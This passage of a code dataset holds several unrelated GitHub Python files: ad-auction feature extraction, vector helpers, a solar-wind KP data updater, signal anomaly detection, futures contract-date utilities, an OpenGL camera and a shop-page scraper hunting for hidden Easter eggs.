represents one impression\n :param result: the list of possible results\n :return: None\n \"\"\"\n\n # Auction - Bidrequests - bidder id\n bidder_id = entry[\"bidderid\"]\n if bidder_id == 36: # Adjusting the index for DSP 36 since we ignore DSP 35 and 37\n bidder_id = 35\n sd.binarize(result, bidder_id-1, 35)\n\n # Auction - Bidrequests - vertical id\n sd.binarize(result, entry[\"verticalid\"]-1, 16)\n\n # Auction - Bidrequests - Impressions - bid Floor\n bid_floor = round(float(entry[\"bidfloor\"]), 2)\n\n if bid_floor-margin == 0:\n result.append(0)\n else:\n result.append(1)\n\n # If bid floor is to be parsed into binary format, create a boolean variable for every interval of size 0.5 from 0 to 28,\n # and according to the value of the bid floor, set the associated boolean variable to 1.\n # Otherwise, just record the value of bid floor.\n if mode == \"bin\":\n index = 0\n if bid_floor < 28:\n index = int(bid_floor*20)\n bid_floor_list = [0]*560\n bid_floor_list[index] = 1\n result.extend(bid_floor_list)\n else:\n result.append(bid_floor)\n\n # Determine if bid floor is a multiple of 0.05 or of 0.1\n for n in [20, 10]:\n bid_floor_tmp = n*bid_floor\n if bid_floor_tmp == int(bid_floor_tmp):\n result.append(1)\n else:\n result.append(0)\n\n # Determine if bid floor is greater than the values in thres_list\n index = 0\n thres_list = [1.5, 2, 2.5, 3, 28]\n for thres in thres_list:\n if bid_floor > thres:\n result.append(1)\n index += 1\n else:\n n = len(thres_list) - index\n result.extend([0]*n)\n break\n\n # Auction - Bidrequests - Impressions - format\n sd.binarize(result, formats_.index(entry[\"format\"]), len(formats_))\n\n # Auction - Bidrequests - Impressions - product\n sd.binarize(result, entry[\"product\"]-1, 6)\n\n # Auction - Bidrequests - Impressions - banner\n width = entry[\"w\"]\n height = entry[\"h\"]\n\n # Determine if banner belongs to any of the following types:\n # 1) h in (0, 200] and w in (0, 500]\n # 2) h in (0, 200] and w in (500, infinity)\n # 3) h in (200, infinity) and w in (0, 500]\n banner_cat = [0, 0, 0]\n if 0 < height <= 200:\n if 0 < width <= 500:\n banner_cat[0] = 1\n elif width > 500:\n banner_cat[1] = 1\n elif (height > 200) and (width <= 500):\n banner_cat[2] = 1\n\n sd.add_to_result(result, (width, height), banners_)\n result.extend(banner_cat)\n\n\ndef get_hearder():\n \"\"\"\n Return the names of features extracted in this section, and the number of variables used to represent each feature.\n :return: a list of tuples containing the feature names and the lengths of the corresponding features\n \"\"\"\n bidder_id = 
(\"bidder_id\", 35)\n vertical_id = (\"vertical_id\", 16)\n bid_floor = (\"bid_floor\", 9)\n format = (\"format\", len(formats_))\n product = (\"product\", 6)\n banner = (\"banner\", 3+len(banners_)+1)\n\n return [bidder_id, vertical_id, bid_floor, format, product, banner]","repo_name":"wlu673/gumgum","sub_path":"Preprocessing/Auction_BidRequests.py","file_name":"Auction_BidRequests.py","file_ext":"py","file_size_in_byte":4022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"39486565186","text":"def Set_equal_dimensions_2_IQ(vect1,vect2):\n\t##this fuction adds 0 to the shorter array in order to \n\t## have same dimension in both arrays\n\tlen1 = len(vect1)\n\tlen2 = len(vect2)\n\tif(len1>len2):\n\t\tfor i in range(len1-len2):\n\t\t\tvect2.append(0)\n\tif(len2>len1):\n\t\tfor i in range(len2-len1):\n\t\t\tvect2.append(0)\n\n\treturn(vect1,vect2)\n\n\ndef operating_array(vect1,vect2,operation):\n\tif(operation==\"dot product\"):\n\t\tdotProduct=[]\n\t\tfor i in range(int(len(vect1))):\n\t\t\tdotProduct.append(vect1[i]*vect2[i])\n\t\treturn dotProduct\n\telif(operation==\"substraction\"):\n\t\tSubstraction=[]\n\t\tfor i in range(int(len(vect1))):\n\t\t\tSubstraction.append(vect1[i]-vect2[i])\n\t\treturn Substraction\n\telif(operation==\"sumation\"):\n\t\tSum=[]\n\t\tfor i in range(int(len(vect1))):\n\t\t\tsum.append(vect1[i]+vect2[i])\n\t\treturn Sum","repo_name":"bobinaman/SDR_NASA","sub_path":"Math_Functions.py","file_name":"Math_Functions.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"9635325832","text":"#!/proj/sot/ska3/flight/bin/python\n\n#####################################################################################################\n# #\n# update_solor_wind_data.py: copy kp data and create a file to match in the required format #\n# #\n# author: t. isobe (tisobe@cfa.harvard.edu) #\n# #\n# last updae: Mar 16, 2021 #\n# #\n#####################################################################################################\n\nimport os\nimport sys\nimport re\nimport string\nimport math\nimport numpy\nimport time\nfrom datetime import datetime\nfrom time import gmtime, strftime, localtime\nimport Chandra.Time\n\npath = '/data/mta4/Space_Weather/house_keeping/dir_list'\n\nwith open(path, 'r') as f:\n data = [line.strip() for line in f.readlines()]\n\nfor ent in data:\n atemp = re.split(':', ent)\n var = atemp[1].strip()\n line = atemp[0].strip()\n exec(\"%s = %s\" %(var, line))\n#for writing out files in test directory\nif (os.getenv('TEST') == 'TEST'):\n os.system('mkdir -p TestOut')\n test_out = os.getcwd() + '/TestOut'\n\n#---------------------------------------------------------------------------------------\n#-- get_kp: copy kp data and create a file to match in the required format --\n#---------------------------------------------------------------------------------------\n\ndef get_kp():\n \"\"\"\n copy kp data and create a file to match in the required format\n input: none but read from: /data/mta4/proj/rac/ops/KP/k_index_data\n output: /solar_wind_data.txt\n \"\"\"\n#\n#--- find out the last update time\n#\n data_dir = kp_dir + 'Data/'\n\n datafilep = data_dir + '/solar_wind_data_past.txt'\n datafile = data_dir + '/solar_wind_data.txt'\n odata = read_data_file(datafilep)\n at = re.split('\\s+', odata[-1])\n otime = at[0] + ':' + at[1] + ':' + at[2] + ':' + at[3][0] \n otime = otime + at[3][1] + ':' + at[3][2] + at[3][3] + ':00'\n otime = datetime.strptime(otime, \"%Y:%m:%d:%H:%M:%S\").strftime(\"%Y:%j:%H:%M:%S\")\n otime = Chandra.Time.DateTime(otime).secs\n#\n#--- read kp data file\n#\n ifile = kp_dir + 'Data/k_index_data_past'\n data = read_data_file(ifile)\n#\n#--- find the part which are not in the data\n#\n line = ''\n for ent in data:\n atemp = re.split('\\s+', ent)\n ltime = float(atemp[0])\n l_time = ltime\n if ltime > otime:\n kval = atemp[1]\n \n ltime = Chandra.Time.DateTime(ltime).date\n mc = re.search('\\.', ltime)\n if mc is not None:\n btemp = re.split('\\.', ltime)\n ltime = btemp[0]\n \n ldate = datetime.strptime(ltime, '%Y:%j:%H:%M:%S').strftime(\"%Y %m %d %H%M\")\n \n line = line + ldate + '\\t\\t' + ldate + '\\t\\t' + kval + '\\t\\t\\t' \n line = line + ldate + '\\t\\t' + kval + '\\t\\t' + kval + '\\n'\n#\n#--- if there is new data, update\n#\n appendfile = datafilep\n #for writing out files in test directory\n if (os.getenv('TEST') == 'TEST'):\n appendfile = test_out + \"/\" + os.path.basename(appendfile)\n if line != '':\n fo = open(appendfile, 'a')\n fo.write(line)\n fo.close()\n\n cmd = 'cp -f ' + datafilep + ' ' + datafile\n os.system(cmd)\n else:\n exit(1)\n#\n#--- add predictive kp data file\n#\n ifile = kp_dir + 'Data/k_index_data'\n data = read_data_file(ifile)\n\n line = ''\n for ent in data:\n atemp = re.split('\\s+', ent)\n ltime = float(atemp[0])\n if ltime <= l_time:\n continue\n\n kval = atemp[1]\n \n ltime = Chandra.Time.DateTime(ltime).date\n mc = re.search('\\.', ltime)\n if mc is not None:\n btemp = re.split('\\.', ltime)\n ltime = btemp[0]\n \n ldate = datetime.strptime(ltime, 
'%Y:%j:%H:%M:%S').strftime(\"%Y %m %d %H%M\")\n \n line = line + ldate + '\\t\\t' + ldate + '\\t\\t' + kval + '\\t\\t\\t' \n line = line + ldate + '\\t\\t' + kval + '\\t\\t' + kval + '\\n'\n#\n#--- if there is new data, update\n#\n appendfile = datafile\n #for writing out files in test directory\n if (os.getenv('TEST') == 'TEST'):\n appendfile = test_out + \"/\" + os.path.basename(appendfile)\n if line != '':\n with open(appendfile, 'a') as fo:\n fo.write(line)\n\n#---------------------------------------------------------------------------------------\n#---------------------------------------------------------------------------------------\n#---------------------------------------------------------------------------------------\n\ndef read_data_file(ifile):\n\n with open(ifile, 'r') as f:\n data = [line.strip() for line in f.readlines()]\n\n return data\n\n#---------------------------------------------------------------------------------------\n\nif __name__ == '__main__':\n\n get_kp()\n\n","repo_name":"chandra-mta/Space_Weather_New","sub_path":"KP/Scripts/update_solor_wind_data.py","file_name":"update_solor_wind_data.py","file_ext":"py","file_size_in_byte":5357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"402199359","text":"# calculate dist between 2 points\ndef getDist(p1, p2):\n return (p2[0] - p1[0])**2 + (p2[1] - p1[1])**2\n\n# permutations of nP2\n\n\ndef getCount(n):\n return n * (n - 1)\n\n# logic is to keep track of number of pairs which has the same distance between them\n# then boomerang count will be nP2 of that pair count\n\n# O(N^2)\n\n\ndef numberOfBoomerangs(points) -> int:\n n = len(points)\n boomCount = 0\n distFreq = dict()\n for i in range(n):\n distFreq.clear()\n for j in range(n):\n if j == i:\n continue\n\n d = getDist(points[i], points[j])\n if d not in distFreq:\n distFreq[d] = 1\n else:\n distFreq[d] += 1\n\n for v in distFreq.values():\n boomCount += getCount(v)\n\n return boomCount\n\n\np = [[0, 0], [1, 0], [-1, 0], [0, 1], [0, -1]]\nprint(numberOfBoomerangs(p))\n","repo_name":"SahilDeb/6Companies30days","sub_path":"Goldman_Sachs_2/BoomerangCount.py","file_name":"BoomerangCount.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"19817992550","text":"import os\nimport pathlib\nimport re\nimport shutil\nimport tempfile\n\nfrom aitemplate.backend import registry\n\n# from . import extra_conv_emit, extra_cutlass_generator, extra_enum\n\n# pylint: disable=C0103,C0415,W0707\n\n\nclass Args:\n def __init__(self, arch):\n self.operations = \"all\"\n self.build_dir = \"\"\n self.curr_build_dir = \"\"\n self.rocm_version = \"5.0.2\"\n self.generator_target = \"\"\n self.architectures = arch\n self.kernels = \"all\"\n self.ignore_kernels = \"\"\n self.kernel_filter_file = None\n self.selected_kernel_list = None\n self.interface_dir = None\n self.filter_by_cc = True\n\n\n@registry.reg(\"rocm.make_ck_lib\")\ndef mk_ck_lib(src_prefix, dst_prefix=None):\n if dst_prefix is None:\n dst_prefix = tempfile.mkdtemp()\n lib_dst = os.path.join(dst_prefix, \"ck_lib\")\n if pathlib.Path(lib_dst).is_dir():\n shutil.rmtree(lib_dst)\n\n os.makedirs(lib_dst)\n with open(os.path.join(lib_dst, \"__init__.py\"), \"w\") as fo:\n fo.write(\"from . import library\\n\")\n fo.write(\"from . import generator\\n\")\n fo.write(\"from . import manifest\\n\")\n fo.write(\"from . import gemm_operation\\n\")\n fo.write(\"from . import conv2d_operation\\n\")\n\n def process_code(src_path, dst_path, code_set):\n pattern = re.compile(r\"from\\s([a-z_0-9]+)\\simport \\*\")\n with open(src_path) as fi:\n lines = fi.readlines()\n output = []\n\n for line in lines:\n match = pattern.match(line)\n if match is not None:\n name = match.groups()[0]\n if name + \".py\" in code_set:\n line = \"from .{name} import *\\n\".format(name=name)\n output.append(line)\n # if \"library.py\" in dst_path:\n # lines = extra_enum.emit_library()\n # output.append(lines)\n # if \"conv2d_operation.py\" in dst_path:\n # lines = extra_conv_emit.emit_library()\n # output.append(lines)\n with open(dst_path, \"w\") as fo:\n fo.writelines(output)\n\n srcs = os.listdir(src_prefix)\n for file in srcs:\n src_path = os.path.join(src_prefix, file)\n if not os.path.isfile(src_path):\n continue\n dst_path = os.path.join(lib_dst, file)\n process_code(src_path, dst_path, srcs)\n\n # extra configs\n # dst_path = os.path.join(lib_dst, \"extra_operation.py\")\n # with open(dst_path, \"w\") as fo:\n # code = extra_ck_generator.emit_library()\n # fo.write(code)\n return dst_prefix\n\n\n@registry.reg(\"rocm.gen_ck_ops\")\ndef gen_ops(arch):\n import ck_lib\n\n args = Args(arch)\n manifest = ck_lib.manifest.Manifest(args)\n try:\n func = getattr(ck_lib.generator, \"Generate\" + arch.upper())\n func(manifest, args.rocm_version)\n except AttributeError as exc:\n raise NotImplementedError(\n \"Arch \" + arch + \" is not supported by current cklib lib.\"\n ) from exc\n return manifest.operations\n","repo_name":"facebookincubator/AITemplate","sub_path":"python/aitemplate/backend/rocm/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3019,"program_lang":"python","lang":"en","doc_type":"code","stars":4323,"dataset":"github-code","pt":"53"}
+{"seq_id":"3119979059","text":"from __future__ import division\r\n\r\nfrom math import sin, cos\r\n\r\nfrom OpenGL import GL as gl, GLU as glu\r\n\r\n\r\nclass Camera(object):\r\n\r\n def __init__(self, x=0.0, y=0.0, zoom=10.0):\r\n self.x = x\r\n self.y = y\r\n self.zoom = zoom\r\n self.angle = 0.0\r\n\r\n def world_projection(self, width, height):\r\n '''\r\n Screen's shortest dimension (usually height) will show exactly\r\n self.zoom of the world in each direction from the center of the screen,\r\n regardless of screen resolution\r\n '''\r\n aspect = width / height\r\n\r\n def getOrtho2DBounds():\r\n left = bottom = -self.zoom\r\n right = top = self.zoom\r\n if width > height: # widescreen\r\n left *= aspect\r\n right *= aspect\r\n elif width < height: # tallscreen\r\n bottom /= aspect\r\n top /= aspect\r\n return left, right, bottom, top\r\n\r\n gl.glMatrixMode(gl.GL_PROJECTION)\r\n gl.glLoadIdentity()\r\n glu.gluOrtho2D(*getOrtho2DBounds())\r\n\r\n\r\n def look_at(self):\r\n gl.glMatrixMode(gl.GL_MODELVIEW)\r\n gl.glLoadIdentity()\r\n glu.gluLookAt(\r\n self.x, self.y, +1.0,\r\n self.x, self.y, -1.0,\r\n sin(self.angle), cos(self.angle), 0.0)\r\n\r\n","repo_name":"tartley/pyong","sub_path":"pyong/camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"19990370437","text":"from functools import partial\r\nimport multiprocessing\r\nimport os\r\nfrom abc import ABC, abstractmethod\r\nfrom dataclasses import dataclass, field\r\nfrom enum import Enum\r\nfrom math import ceil, floor\r\nfrom pathlib import Path\r\nfrom typing import Callable, Self\r\n\r\nimport numpy as np\r\nimport seaborn as sns\r\nimport wfdb\r\nfrom matplotlib import pyplot as plt\r\nfrom numpy import typing as npt\r\nfrom scipy.signal import cwt, find_peaks, ricker\r\nfrom src.config import AnomalyConfig, load_config\r\n\r\nfrom copy import deepcopy\r\n\r\nPEAK_COLOR = \"r\"\r\n\r\n\r\nclass AnomalyType(str, Enum):\r\n max = \"max\"\r\n min = \"min\"\r\n line = \"line\"\r\n peak_count = \"peaks\"\r\n\r\n def __str__(self) -> str:\r\n return self.value\r\n\r\n\r\nclass SignalType(str, Enum):\r\n icp = \"ICP\"\r\n abp = \"ABP\"\r\n\r\n def __str__(self) -> str:\r\n return self.value\r\n\r\n\r\n@dataclass()\r\nclass Anomaly(ABC):\r\n start: float\r\n end: float\r\n\r\n @abstractmethod\r\n def extend(self, other: Self):\r\n ...\r\n\r\n def overlap(self, other: \"SingleAnomaly | MergedAnomalies\") -> float:\r\n \"\"\"\r\n measuring overlapping area\r\n\r\n Args:\r\n other (Self): other measuret segment\r\n\r\n Returns:\r\n float: overlapped area relative to other\r\n \"\"\"\r\n # if self.end < other.start or other.end < self.start:\r\n # return 0\r\n if self.start < other.start or self.end > other.end:\r\n self,other = other, self # type: ignore\r\n if other.length() == 0:\r\n if self.start <= other.start and self.end >= other.end:\r\n return 1\r\n return 0\r\n if self.end <= other.start or self.start >= other.end : # check if the there is so overlap\r\n return 0\r\n return max((min(self.end,other.end) - max(other.start,self.start)) / other.length(),0)\r\n \r\n def distance(self, other: \"SingleAnomaly | MergedAnomalies\") -> float:\r\n if self.overlap(other) > 0:\r\n return 0\r\n return max(self.start, other.start) - min(self.end, other.end)\r\n\r\n def length(self) -> float:\r\n return max(self.end - self.start, 0) \r\n\r\n\r\n@dataclass\r\nclass SingleAnomaly(Anomaly):\r\n type: AnomalyType\r\n\r\n def extend(self, other: Self) -> None:\r\n if not self.type == other.type:\r\n return\r\n if self.start > other.start:\r\n self.start = other.start\r\n if self.end < other.end:\r\n self.end = other.end\r\n\r\n def convert(self) -> \"MergedAnomalies\":\r\n return MergedAnomalies(self.start, self.end, {self.type : [self]})\r\n\r\n def __str__(self) -> str:\r\n return f\"{self.start}-{self.end}: {str(self.type)}\"\r\n\r\n\r\n@dataclass\r\nclass MergedAnomalies(Anomaly):\r\n type: dict[AnomalyType,list[SingleAnomaly]]\r\n\r\n def extend(self, other: SingleAnomaly| Self):\r\n if self.start > other.start:\r\n self.start = other.start\r\n\r\n if self.end < other.end:\r\n self.end = other.end\r\n\r\n if isinstance(other, SingleAnomaly):\r\n if other.type == AnomalyType.line:\r\n ...\r\n self._extend_anomaly(other)\r\n\r\n else:\r\n for key in other.type:\r\n if key == AnomalyType.line:\r\n ...\r\n anomalies = other.type[key]\r\n for anomaly in anomalies:\r\n self._extend_anomaly(anomaly)\r\n \r\n \r\n\r\n def __str__(self) -> str:\r\n return f\"{self.start}-{self.end}: {', '.join(list(self.type))}\"\r\n \r\n def length(self,type:AnomalyType | None = None) -> float:\r\n if type:\r\n if not self.type.get(type):\r\n return 0.\r\n return sum([anomaly.length() for anomaly in self.type[type]])\r\n return self.end - self.start\r\n \r\n def _extend_anomaly(self,other: 
SingleAnomaly):\r\n if other.type == AnomalyType.line:\r\n ...\r\n anomalies = self.type.get(other.type)\r\n if not anomalies:\r\n self.type[other.type] = [other]\r\n else:\r\n overlaps = []\r\n distances = []\r\n for anomaly in self.type[other.type]:\r\n overlaps.append(other.overlap(anomaly))\r\n distances.append(other.distance(anomaly))\r\n id = overlaps.index(max(overlaps))\r\n if overlaps[id] == 0:\r\n id_dist = distances.index(min(distances))\r\n if distances[id_dist] <= load_config().distance:\r\n anomalies[id_dist].extend(deepcopy(other))\r\n else:\r\n anomalies.append(deepcopy(other))\r\n else:\r\n anomalies[id].extend(deepcopy(other))\r\n\r\n @classmethod\r\n def join(cls, *arg: SingleAnomaly | Self) -> Self:\r\n start = min([anomaly.start for anomaly in arg])\r\n end = max([anomaly.end for anomaly in arg])\r\n tmp = cls(start,end,{})\r\n\r\n for anomaly in arg:\r\n if isinstance(anomaly,MergedAnomalies):\r\n for key in anomaly.type.keys():\r\n for single_anomaly in anomaly.type[key]:\r\n tmp.extend(single_anomaly)\r\n else:\r\n tmp.extend(anomaly)\r\n\r\n return tmp\r\n\r\n\r\n\r\ndef window_average(values: npt.NDArray, window_size: int) -> tuple[npt.NDArray, float]:\r\n for idx, window in enumerate(np.lib.stride_tricks.sliding_window_view(values, window_size)[window_size:]):\r\n values[window_size + idx] = window.mean()\r\n\r\n peaks = find_peaks(values)\r\n return values, len(peaks)\r\n\r\n\r\ndef find_peaks_filtered(values: npt.NDArray, wavelet_len: float, wavelet: Callable):\r\n filtered = cwt(values, wavelet, [wavelet_len])\r\n return find_peaks(filtered[0])[0]\r\n\r\n\r\n@dataclass\r\nclass Signal:\r\n signal: npt.NDArray\r\n fs: int # sampling frequency of the signal\r\n peaks_per_second: float\r\n path: Path\r\n window_indexes: npt.NDArray = field(init=False)\r\n wavelet: Callable\r\n wavelet_len: float\r\n\r\n @classmethod\r\n def load_signal(\r\n cls,\r\n path: Path,\r\n type: SignalType,\r\n cpu_count: int | None = os.cpu_count(),\r\n wavelet_len: float = 5,\r\n wavelet: Callable = ricker,\r\n ):\r\n \"\"\"\r\n load the signal file into memory\r\n\r\n Args:\r\n path (Path): path to the signal file\r\n type (SignalType): which signal from file load\r\n\r\n Returns:\r\n Signal: signal object with loaded signal\r\n \"\"\"\r\n cpu_count = cpu_count if cpu_count else 1\r\n signals, fields = wfdb.rdsamp(path)\r\n\r\n signal_type = fields[\"sig_name\"].index(type.value)\r\n signal: npt.NDArray = signals[:, signal_type].astype(np.float64)\r\n del signals\r\n\r\n split = np.array_split(signal, cpu_count)\r\n # filtered_signal, peaks = window_average(signal,average_window_size)\r\n\r\n # peaks_per_second = peaks / (len(signal)/fields[\"fs\"])\r\n\r\n peak_finding = partial(find_peaks_filtered, wavelet_len=wavelet_len, wavelet=ricker)\r\n\r\n # preprocess signal in parallel on splitted signal\r\n with multiprocessing.Pool(cpu_count) as pool:\r\n preprocessed_signal = pool.map(peak_finding, split)\r\n\r\n peaks_per_second = np.sum([len(peaks_window) for peaks_window in preprocessed_signal]) / (len(signal) / fields[\"fs\"])\r\n\r\n return cls(\r\n signal=signal,\r\n fs=fields[\"fs\"],\r\n peaks_per_second=peaks_per_second,\r\n path=path,\r\n wavelet=wavelet,\r\n wavelet_len=wavelet_len,\r\n )\r\n\r\n def look(self, start: float, end: float, peaks: bool = True):\r\n \"\"\"\r\n Open graph window with time series of the signal in specified range. 
Unit are in the seconds\r\n\r\n Args:\r\n start (float): start of the range (in seconds)\r\n end (float): end of the range (in seconds)\r\n peaks (bool, optional): Whether to visualize peaks. Defaults to True.\r\n \"\"\"\r\n _, axes = plt.subplots()\r\n values = self.signal[ceil(start * self.fs) : floor(end * self.fs)]\r\n sns.lineplot(y=values, x=np.arange(start, end, 1 / self.fs), ax=axes)\r\n if peaks:\r\n found_peaks = find_peaks_filtered(values, self.wavelet_len, self.wavelet)\r\n sns.scatterplot(x=(found_peaks / self.fs) + start, y=[values[t] for t in found_peaks], ax=axes, color=PEAK_COLOR)\r\n plt.show(block=True)\r\n\r\n def check(\r\n self,\r\n anomaly: AnomalyType,\r\n th: float,\r\n config: AnomalyConfig,\r\n window_size: float = 5,\r\n stride: float | None = None,\r\n ) -> list[SingleAnomaly]:\r\n anomalies: list[SingleAnomaly] = []\r\n detected = False\r\n index = 0\r\n start = 0\r\n window_size = floor(window_size * self.fs)\r\n stride = floor(stride * self.fs) if stride else 1\r\n self.window_indexes = np.arange(0, window_size, 1)\r\n prev_anomaly: SingleAnomaly | None = None\r\n\r\n for idx, window in enumerate(np.lib.stride_tricks.sliding_window_view(self.signal, window_size)[::stride, :]):\r\n anomaly_index = getattr(self, f\"filter_{anomaly}\")(window, th=th)\r\n if isinstance(anomaly_index,tuple):\r\n if not detected:\r\n start = anomaly_index[0] + idx * stride\r\n detected = True\r\n index =idx * stride + anomaly_index[1]\r\n elif detected:\r\n current_anomaly = SingleAnomaly(start / self.fs, index / self.fs, anomaly)\r\n if prev_anomaly and prev_anomaly.distance(current_anomaly) <= config.distance:\r\n prev_anomaly.extend(current_anomaly)\r\n continue\r\n \r\n anomalies.append(current_anomaly)\r\n prev_anomaly = current_anomaly\r\n detected = False\r\n\r\n if detected:\r\n current_anomaly = SingleAnomaly(start / self.fs, index / self.fs, anomaly)\r\n if prev_anomaly and prev_anomaly.distance(current_anomaly) <= config.distance:\r\n prev_anomaly.extend(current_anomaly)\r\n else:\r\n anomalies.append(current_anomaly)\r\n\r\n\r\n return anomalies\r\n\r\n # === filtering functions===\r\n def filter_max(\r\n self,\r\n window: npt.NDArray,\r\n th: int = 90,\r\n ) -> tuple[int,int]| None:\r\n idx = np.argwhere(window >= th)\r\n if idx.size > 0 :\r\n return idx[0][0], idx[0][-1]\r\n\r\n def filter_min(self, window: npt.NDArray, th: int = -30) -> tuple[int,int] | None:\r\n idx = np.argwhere(window <= th)\r\n if idx.size > 0 :\r\n return idx[0][0], idx[0][-1]\r\n\r\n def filter_line(self, window: npt.NDArray, th: float = 0.03) -> tuple[int,int] | None:\r\n coef = np.polynomial.polynomial.Polynomial.fit(self.window_indexes, window, 1)\r\n if np.sqrt(np.power(coef(window) - window, 2)).mean() < th:\r\n return 0, window.shape[0]\r\n\r\n def filter_peaks(self, window: npt.NDArray, th: float = 0.5) -> tuple[int,int]| None:\r\n peaks = find_peaks_filtered(window, self.wavelet_len, self.wavelet)\r\n seconds = len(window) / self.fs\r\n peaks_per_second = len(peaks) / seconds\r\n\r\n if peaks_per_second > self.peaks_per_second * (1 + th) or peaks_per_second < self.peaks_per_second * (1 - th):\r\n return 0, window.shape[0]\r\n\r\n # ==========================\r\n","repo_name":"daviholy/aso1","sub_path":"src/filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":11478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"17043346424","text":"# -*- coding: utf-8 -*-\n\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jun 3 11:20:31 2017\n\n@author: Heng\n\"\"\"\n\nimport calendar\nfrom datetime import timedelta\n\n\nimport pandas as pd \nfrom enum import Enum\n\n\ndef toMonthCode(ticker,monthCode):\n tickerCode = list()\n for t in ticker:\n code = monthCode[t]\n tickerCode.append(code)\n\n return tickerCode\n \n \n#def generateTrade(signal_list,mktData,risk_limit,long_bond,short_bond,today):\n# raw_trades = list()\n# #t1 = trade(\"X08\",10,1.25,today)\n# for key in list(signal_list.index):\n# s = signal_list.loc[key]['signal']\n# amount = 10 if s= 15 else d + timedelta(weeks=1)\n \ndef contractDate(d,n):\n Maturity = list()\n \n Exp_thisMonth = calendar.Calendar(2).monthdatescalendar(d.year, d.month)[3][0]\n if Exp_thisMonth >= d:\n Maturity.append(Exp_thisMonth)\n else:\n Maturity.append(next_third_Wednesday(Exp_thisMonth))\n \n for i in range(n-1):\n Maturity.append(next_third_Wednesday(Maturity[i]))\n \n return Maturity\n\ndef expiryCalc(ticker,today):\n dates = contractDate(today,7)\n monthMap = {\"F\":1, \"G\":2, \"H\":3,\"J\":4,\"K\":5, \"M\":6, \"N\":7,\"Q\":8,\"U\":9, \"V\":10, \"X\":11,\"Z\":12}\n code = ticker.split(\"_\") \n month = monthMap[code[1][0]]\n for date in dates:\n if month == date.month : expiry = date - today\n \n return expiry.days\n\n\n\n \ndef contractCode(d,n):\n monthcode = {1:\"F\", 2:\"G\", 3:\"H\",4:\"J\",5:\"K\", 6:\"M\", 7:\"N\",8:\"Q\",9:\"U\", 10:\"V\", 11:\"X\",12:\"Z\"}\n dates = contractDate(d,n)\n code_list = list(map(lambda aday: monthcode[aday.month] + str(aday.year)[2:],dates))\n code = dict()\n contract_list = ['f1','f2','f3','f4','f5','f6','f7']\n for i in range(len(code_list)):\n code[contract_list[i]] = code_list[i]\n\n for i in range(0,len(code_list)-1):\n for j in range(i+1,len(code_list)):\n futName = contract_list[j]+\"_\"+contract_list[i]\n monName = code[contract_list[j]]+\"_\"+code[contract_list[i]]\n code[futName] = monName\n \n return code\n\ndef tradeFilter(tradeList, priority, monthCodeMap):\n priority_code = list()\n\n for ticker in priority:\n priority_code.append(monthCodeMap[ticker])\n priorityMap = dict()\n TopOrder = 100 # this looks stupid, is there a better to get Top priority trade\n TopOrderTrade = None\n for trade in tradeList:\n ticker = trade.ticker\n order = priority_code.index(ticker)\n priorityMap[ticker] = order\n if TopOrder > order:\n TopOrder = order\n TopOrderTrade = trade\n tradeList = list()\n tradeList.append(TopOrderTrade) \n return tradeList\n\n\n\n\n\n \n\n\n\n","repo_name":"project-rubick/master","sub_path":"BackTestingHeader.py","file_name":"BackTestingHeader.py","file_ext":"py","file_size_in_byte":4591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"6218304812","text":"import logging\nimport random\nimport re\nimport sys\nfrom time import sleep\n\nimport requests\n\nlogger = logging.getLogger(__name__)\n\nSECRETS = []\nSECRET_TEXT = 'Sie haben einen Geist gefunden'\nUSER_AGENT = 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:41.0) Gecko/20100101 Firefox/41.0'\n\n\ndef check_article_for_secret(s: requests.Session, pr_link: str, ref_link: str):\n '''\n Checks an article for a secret and stores the article number if it exists\n '''\n\n try:\n r = s.get(\n url=pr_link,\n headers={ 'Referer': ref_link }\n )\n\n except requests.exceptions.RequestException:\n logger.error('[-] Request failed, terminating...', exc_info=True)\n sys.exit(1)\n\n data = r.text\n\n if data.find(SECRET_TEXT) != -1:\n logger.info(f'[+] Found secret at {pr_link}')\n g = re.findall(r'(\\d*)<', data)\n SECRETS.append(g[0])\n\n\ndef get_articles(s: requests.Session, mf_link: str):\n '''\n Finds all products and checks each for a secret\n '''\n\n try:\n r = s.get(\n url=mf_link,\n headers={ 'Referer': 'https://www.mindfactory.de/' }\n )\n\n except requests.exceptions.RequestException:\n logger.error('[-] Request failed, terminating...', exc_info=True)\n sys.exit(1)\n\n articles = re.findall(r'\"(.*)\" class=\"p-complete-link visible-xs visible-sm', r.text)\n\n for article_link in articles:\n check_article_for_secret(s, article_link, mf_link)\n\n\ndef main():\n '''\n finds hidden secrets on mindfactory\n '''\n\n all_links = ['']\n\n sess = requests.Session()\n\n # set user cookies\n sess.cookies.set('NSid', '', domain='.mindfactory.de', path='/')\n sess.cookies.set('lz_userid', '', domain='chat.mindfactory.de', path='/livezilla')\n sess.cookies.set('cookies_accepted', 'true')\n\n # set user agent\n sess.headers.update({'User-Agent': USER_AGENT})\n\n for link in all_links:\n\n if not link.endswith('/article_per_page/5'):\n link = f'{link}/article_per_page/5'\n\n get_articles(sess, link)\n logger.debug('Waiting for next link...')\n sleep(3)\n\n if SECRETS:\n logger.info(f'[+] article numbers: {\",\".join(SECRETS)}')\n else:\n logger.warn('[-] No secrets found?')\n\n return 0\n\n\nif __name__ == '__main__':\n logging.basicConfig(level=logging.INFO,\n format='%(asctime)s - %(levelname)s - %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S',\n filename='spam.log',\n filemode='a'\n )\n c = logging.StreamHandler()\n c.setLevel(logging.INFO)\n f = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s')\n c.setFormatter(f)\n logger.addHandler(c)\n 